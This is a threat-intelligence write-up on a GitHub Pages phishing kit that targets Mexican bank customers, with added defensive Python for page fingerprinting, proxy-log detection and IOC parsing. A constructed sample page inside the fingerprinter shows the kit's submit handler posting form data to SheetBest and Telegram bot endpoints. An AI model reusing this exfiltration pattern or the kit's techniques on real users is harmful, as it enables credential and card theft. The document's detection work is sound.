A sophisticated, long-running phishing operation has evolved into a serverless, modular campaign that weaponizes GitHub Pages to harvest payment card data, credentials, and customer identifiers from banking customers in Mexico.
The campaign's architecture centers on a phishing kit containing a selector panel that operators use to generate institution-specific landing pages.
These landing pages impersonate at least a dozen financial institutions, supporting both desktop and mobile interfaces to maximize victim engagement.
Rather than relying on a single domain, operators deployed the kit across more than 100 GitHub Pages repositories, each publishing cloned pages under varied directory paths (for example /cancelacion/, /soporte/, /mb1/) to increase redundancy, evade takedown, and enable rapid redeployment when individual repositories are removed.
Group-IB researchers have attributed the campaign's persistence, scale, and operational discipline to a reusable phishing kit that combines distributed GitHub Pages hosting, obfuscated client-side scripts, and third-party APIs, most notably SheetBest, to exfiltrate stolen data.
Technically, the attack flow is multi-stage. Victims are lured to a trust-building impersonation page and then redirected to credential-harvesting forms that mimic legitimate banking login workflows.
Modular Phishing Kit Uses GitHub Pages
The pages attach JavaScript submit listeners that call e.preventDefault(), serialize form field values into JSON, and POST them to SheetBest API endpoints.
These requests populate attacker-controlled Google Sheets in real time, eliminating the need to maintain command-and-control servers.
Group-IB identified several SheetBest endpoints associated with the campaign, all resolving to the same backend IP, and observed identical submission logic reused across multiple templates: strong indicators of a centralized, serverless exfiltration backend supporting a many-to-one data collection model.

To complicate detection, phishing pages load obfuscated external JavaScript from randomized paths rather than embedding logic directly in the HTML.
Payload rotation is possible without altering the visible page, undermining signature-based detection. Some instances also used hardcoded Telegram bot tokens and chat IDs to forward stolen credentials in real time, illustrating operational flexibility in exfiltration channels.
Repository metadata and commit histories reveal active maintenance by several operator accounts over more than a year, with continuous commits, template updates, and endpoint rotations.

Deployment leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, and pages included Open Graph metadata to craft convincing link previews for messaging apps.
A robots noindex,nofollow directive confirmed these pages were not intended for organic discovery but for targeted distribution via SMS, WhatsApp, Telegram, or social media, where link previews can significantly increase click-through rates.
This campaign underscores a maturing trend: threat actors are abusing reputable cloud platforms' trust, HTTPS, and deployment ease to conduct resilient phishing at scale.
By exploiting services like GitHub Pages and SheetBest, attackers reduce their infrastructure footprint and complicate attribution and takedown efforts.
For defenders, the implications are clear: traditional blocklists and domain blacklisting are insufficient.
Financial institutions and security teams must prioritize behavioral detections, continuous monitoring for brand impersonation across developer and hosting platforms, rapid takedown coordination with service providers, and sector-wide intelligence sharing.
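The page traits described in the two preceding sections (a submit handler that calls preventDefault and posts to a SheetBest endpoint, a hardcoded Telegram bot token, an external script under a random-looking path, a robots noindex,nofollow directive, and Open Graph preview tags) can be fingerprinted statically from fetched HTML. The following is an added example written for this article, not code from Group-IB or from the kit. The sample page, the sheet id, the token and the hostnames inside it are constructed placeholders; the entropy threshold in `looks_randomized` and the bot-token regex are assumptions, and only inline scripts are inspected (external scripts would need to be fetched and scanned the same way).

```python
import math
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page reproducing only the traits the report describes.
# The sheet id, bot token and hostnames are placeholders, not real indicators.
FAKE_TOKEN = "0000000000:" + "PLACEHOLDERTOKEN" + "x" * 19   # shape of a bot token only
SAMPLE_PAGE = """
<html><head>
<meta name="robots" content="noindex,nofollow">
<meta property="og:title" content="Soporte Banco Ejemplo">
<meta property="og:image" content="https://example-repo.github.io/soporte/logo.png">
<script src="/soporte/js/Zx9qT4kLp2WmR8vN.js"></script>
</head><body>
<form id="login"><input name="user"><input name="pass"></form>
<script>
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  fetch('https://api.sheetbest.com/sheets/SHEET-ID-PLACEHOLDER', {method: 'POST'});
  fetch('https://api.telegram.org/bot__TOKEN__/sendMessage');
});
</script></body></html>
""".replace("__TOKEN__", FAKE_TOKEN)

SHEETBEST_RE = re.compile(r"https?://api\.sheetbest\.com/sheets/[\w-]+", re.I)
# Commonly documented bot token shape (assumption): 8-10 digits, a colon, 35 token chars
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot\d{8,10}:[A-Za-z0-9_-]{35}")


class PageInspector(HTMLParser):
    """Collect meta tags, external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.meta = {}
        self.script_srcs = []
        self.inline_js = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta":
            key = a.get("name") or a.get("property")
            if key:
                self.meta[key.lower()] = a.get("content") or ""
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline_js.append(data)


def shannon_entropy(s):
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s)) if n else 0.0


def looks_randomized(src):
    """Heuristic (assumption): a long, high-entropy, letters+digits file name suggests a
    rotated/randomized script path rather than a library name such as jquery.min.js."""
    name = urlparse(src).path.rsplit("/", 1)[-1].rsplit(".", 1)[0]
    return (len(name) >= 12 and shannon_entropy(name) >= 3.5
            and any(c.isdigit() for c in name) and any(c.isalpha() for c in name))


def fingerprint(html):
    """Return (per-trait findings, number of traits hit) for one fetched page."""
    p = PageInspector()
    p.feed(html)
    js = "\n".join(p.inline_js)
    robots = p.meta.get("robots", "").lower().replace(" ", "")
    findings = {
        "sheetbest_submit_handler": bool(SHEETBEST_RE.search(js)) and "preventDefault" in js,
        "telegram_bot_token": bool(TELEGRAM_RE.search(js)),
        "randomized_script_path": any(looks_randomized(s) for s in p.script_srcs),
        "noindex_nofollow": "noindex" in robots and "nofollow" in robots,
        "open_graph_preview": any(k.startswith("og:") for k in p.meta),
    }
    return findings, sum(findings.values())


if __name__ == "__main__":
    hits, score = fingerprint(SAMPLE_PAGE)
    for trait, hit in hits.items():
        print(f"{trait:26} {'HIT' if hit else '-'}")
    print("score:", score)
```

No single trait is conclusive (many legitimate sites set noindex or Open Graph tags), so the score is meant to rank candidate pages found by brand-impersonation monitoring for analyst review, with the SheetBest submit handler and the embedded bot token weighing far more than the rest.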
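One concrete form of the behavioral detection the previous paragraph calls for: in egress proxy logs, a browser POST to a no-code data-collection API (SheetBest, a Telegram bot endpoint) whose Referer is a page on a shared static host such as github.io is the kit's exfiltration step, and a visit to one of the directory names the report lists on such a host is a weaker companion signal. The code below is an added example, not from the article or Group-IB; the log lines are constructed (the hostname is taken from the IOC table, the sheet id and bot path are placeholders), and the static-host suffix list is an assumption to extend for your environment.

```python
from urllib.parse import urlparse

# Constructed proxy log lines (not from the report): ts client method url referer status.
# The first client walks a page on an IOC hostname from the table and then posts to the
# two exfiltration services; the second client is a benign internal user of SheetBest.
SAMPLE_LOG = """\
2025-07-01T10:00:01Z 10.1.2.3 GET https://soporte-0725.github.io/soporte/ - 200
2025-07-01T10:00:02Z 10.1.2.3 GET https://soporte-0725.github.io/soporte/js/Zx9qT4kLp2WmR8vN.js https://soporte-0725.github.io/soporte/ 200
2025-07-01T10:00:09Z 10.1.2.3 POST https://api.sheetbest.com/sheets/SHEET-ID-PLACEHOLDER https://soporte-0725.github.io/soporte/ 200
2025-07-01T10:00:10Z 10.1.2.3 POST https://api.telegram.org/botPLACEHOLDER/sendMessage https://soporte-0725.github.io/soporte/ 200
2025-07-01T10:05:00Z 10.1.2.9 GET https://docs.example.org/guide/ - 200
2025-07-01T10:06:00Z 10.1.2.9 POST https://api.sheetbest.com/sheets/TEAM-SHEET-PLACEHOLDER https://intranet.example.org/form 200
"""

# Services the report names as exfiltration channels, with the path prefix each uses
EXFIL_SERVICES = {"api.sheetbest.com": "/sheets/", "api.telegram.org": "/bot"}
# Static-hosting suffixes where anyone can publish (assumption; extend for other hosts)
STATIC_HOST_SUFFIXES = (".github.io",)
# Directory names the report lists for the cloned pages
WATCHED_PATHS = {"cancelacion", "soporte", "mb1"}
SEVERITY = {"info": 0, "medium": 1, "high": 2}


def parse_line(line):
    ts, client, method, url, referer, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "referer": None if referer == "-" else referer, "status": int(status)}


def is_exfil_service(url):
    u = urlparse(url)
    prefix = EXFIL_SERVICES.get(u.hostname or "")
    return prefix is not None and u.path.startswith(prefix)


def is_static_host(url):
    return (urlparse(url).hostname or "").endswith(STATIC_HOST_SUFFIXES)


def evaluate(rec):
    """Return (severity, rule) pairs for one request record."""
    hits = []
    if rec["method"] == "POST" and is_exfil_service(rec["url"]):
        # The referer is the key signal: a form post to a no-code API from a page on a
        # static host the organisation does not publish to is the kit's exfil step.
        if rec["referer"] and is_static_host(rec["referer"]):
            hits.append(("high", "form-post-to-exfil-service-from-static-host"))
        else:
            hits.append(("info", "post-to-exfil-service"))  # may be legitimate internal use
    if is_static_host(rec["url"]):
        first_segment = urlparse(rec["url"]).path.strip("/").split("/")[0]
        if first_segment in WATCHED_PATHS:
            hits.append(("medium", "watched-directory-on-static-host"))
    return hits


def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for sev, rule in evaluate(rec):
            findings.append({"client": rec["client"], "severity": sev,
                             "rule": rule, "url": rec["url"]})
    return findings


def worst_severity_per_client(findings):
    """Collapse findings to the most severe rule hit per client for triage."""
    worst = {}
    for f in findings:
        c = f["client"]
        if c not in worst or SEVERITY[f["severity"]] > SEVERITY[worst[c]]:
            worst[c] = f["severity"]
    return worst


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:10} {f['rule']:45} {f['url']}")
    print(worst_severity_per_client(scan(SAMPLE_LOG)))
```

The internal user's POST to SheetBest is deliberately kept at info level: the service itself is legitimate, so alerting on the destination alone would recreate the blocklist problem the article describes, whereas the referer-plus-destination pairing survives the operators' repository and endpoint rotation.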
Indicators of Compromise (IOCs)
| # | Hostname | Count |
|---|---|---|
| 1 | soporte-index25.github[.]io | 2 |
| 2 | soporte-index09.github[.]io | 2 |
| 3 | sntdr-soporte25.github[.]io | 1 |
| 4 | sntdr-soporte25.github[.]io | 1 |
| 5 | 07-soporte.github[.]io | 2 |
| 6 | soporte2507.github[.]io | 2 |
| 7 | soporte160625.github[.]io | 3 |
| 8 | soporte250324.github[.]io | 2 |
| 9 | soporte74.github[.]io | 4 |
| 10 | soporte-bm1.github[.]io | 1 |
| 11 | soporte-r5.github[.]io | 3 |
| 12 | api.sheetbest.com | 2 |
| 13 | soporte0625.github[.]io | 2 |
| 14 | soporte200525.github[.]io | 2 |
| 15 | soporte2650.github[.]io | 1 |
| 16 | soporte-bn1.github[.]io | 1 |
| 17 | soporte-b2.github[.]io | 1 |
| 18 | soporte-index.github[.]io | 2 |
| 19 | soporte-c1.github[.]io | 1 |
| 20 | soporte-b4.github[.]io | 1 |
| 21 | sntndr25-soporte.github[.]io | 2 |
| 22 | sntndr-soporte0825.github[.]io | 2 |
| 23 | 0825-soporte.github[.]io | 2 |
| 24 | soporte-07-25.github[.]io | 2 |
| 25 | soporte-0725.github[.]io | 2 |
| 26 | 0725soporte.github[.]io | 2 |
| 27 | soporte0725-3.github[.]io | 2 |
| 28 | soporte0725.github[.]io | 2 |
| 29 | soporteyatencionf.github[.]io | 2 |
| 30 | 0725-soporte.github[.]io | 2 |
| 31 | soporte-y-atencion.github[.]io | 1 |
| 32 | soporter03.github[.]io | 1 |
| 33 | respaldo94.github[.]io | 2 |
| 34 | soporte-index05.github[.]io | 1 |
| 35 | soporte-b1.github[.]io | 1 |
| 36 | soporte0625.github[.]io | 2 |
| 37 | soporte250324.github[.]io | 2 |
| 38 | fldsmdfr-94.github[.]io | 2 |
| 39 | support-vh.github[.]io | 1 |
Note: IP addresses and domains are deliberately defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
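Ingesting the table above is where two practical details matter: several hostnames appear in more than one row (their counts should be merged, not double-counted), and every github.io entry is a tenant hostname on a shared platform, so a parent-domain match on github.io would flag every GitHub Pages site. The following is an added example for this article, not tooling from Group-IB; it embeds a subset of the table verbatim (still defanged), refangs it on load, and matches candidates exactly. The keyword watchlist in `lookalike_labels` is an assumption drawn from the naming seen in the table.

```python
import re
from collections import Counter

# A subset of the IOC table above, copied verbatim (defanged) so the example runs offline.
IOC_TABLE = """\
| # | Hostname | Count |
|---|---|---|
| 3 | sntdr-soporte25.github[.]io | 1 |
| 4 | sntdr-soporte25.github[.]io | 1 |
| 9 | soporte74.github[.]io | 4 |
| 12 | api.sheetbest.com | 2 |
| 25 | soporte-0725.github[.]io | 2 |
| 35 | soporte-b1.github[.]io | 1 |
| 39 | support-vh.github[.]io | 1 |
"""

ROW_RE = re.compile(r"^\|\s*(\d+)\s*\|\s*(\S+)\s*\|\s*(\d+)\s*\|$")


def refang(indicator):
    """Undo the common defanging conventions ([.], hxxp)."""
    return (indicator.replace("[.]", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def defang(hostname):
    """Defang every dot (the table above defangs only the last one; both refang cleanly)."""
    return hostname.replace(".", "[.]")


def normalize_host(hostname):
    """Refang, lowercase and drop a trailing dot so fanged and defanged forms compare equal."""
    return refang(hostname).strip().lower().rstrip(".")


def parse_ioc_table(markdown):
    """Return {refanged hostname: total count}, merging rows that repeat a hostname."""
    totals = Counter()
    for line in markdown.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            totals[normalize_host(m.group(2))] += int(m.group(3))
    return totals


def lookup(candidate, iocs):
    """Exact match only: suffix-matching github.io would cover every GitHub Pages site."""
    return iocs.get(normalize_host(candidate))


def lookalike_labels(iocs, keywords=("soporte", "support")):
    """Hostnames whose first label reuses the support-desk wording seen in the table
    (assumed watchlist for brand-impersonation monitoring, not a rule from the report)."""
    return sorted(h for h in iocs if any(k in h.split(".")[0] for k in keywords))


if __name__ == "__main__":
    iocs = parse_ioc_table(IOC_TABLE)
    for host, count in sorted(iocs.items()):
        print(f"{defang(host):35} {count}")
    print("match:", lookup("SOPORTE74.GITHUB[.]IO.", iocs))
    print("lookalikes:", lookalike_labels(iocs))
```

Note that api.sheetbest.com is listed alongside the phishing hostnames; it is the legitimate API the kit abuses, so it belongs in a detection watchlist (see the referer-based rule earlier) rather than on an outright block list if the organisation uses the service itself.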